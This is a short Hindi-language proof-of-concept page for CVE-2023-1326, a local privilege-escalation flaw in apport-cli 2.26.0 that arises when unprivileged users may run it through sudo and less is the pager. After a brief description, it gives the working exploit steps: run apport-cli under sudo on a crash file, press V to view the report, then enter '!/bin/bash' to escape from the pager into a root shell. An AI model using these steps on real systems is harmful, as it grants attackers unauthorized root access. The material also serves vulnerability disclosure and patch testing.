
CVE-2023-1326 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo और less को पेजर के रूप में कॉन्फ़िगर किए जाने पर apport-cli 2.26.0 में एक विशेषाधिकार वृद्धि भेद्यता।
एक प्रमाण की अवधारणा (PoC) CVE-2023–1326 के लिए apport-cli 2.26.0 में
यह भेद्यता apport-cli 2.26.0 में विशेषाधिकार वृद्धि है, CVE-2023–26604 के समान, यह भेद्यता केवल तभी काम करती है यदि sudoers में निर्दिष्ट हो:

एक विशेषाधिकार वृद्धि हमला apport-cli 2.26.0 और पिछले संस्करणों में पाया गया जो CVE-2023-26604 के समान है। यदि कोई सिस्टम विशेष रूप से कॉन्फ़िगर किया गया है ताकि अनप्रिविलेज्ड उपयोगकर्ता sudo apport-cli चला सकें, less को पेजर के रूप में कॉन्फ़िगर किया गया है, और टर्मिनल का आकार सेट किया जा सकता है: एक स्थानीय हमलावर विशेषाधिकार बढ़ा सकता है।
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
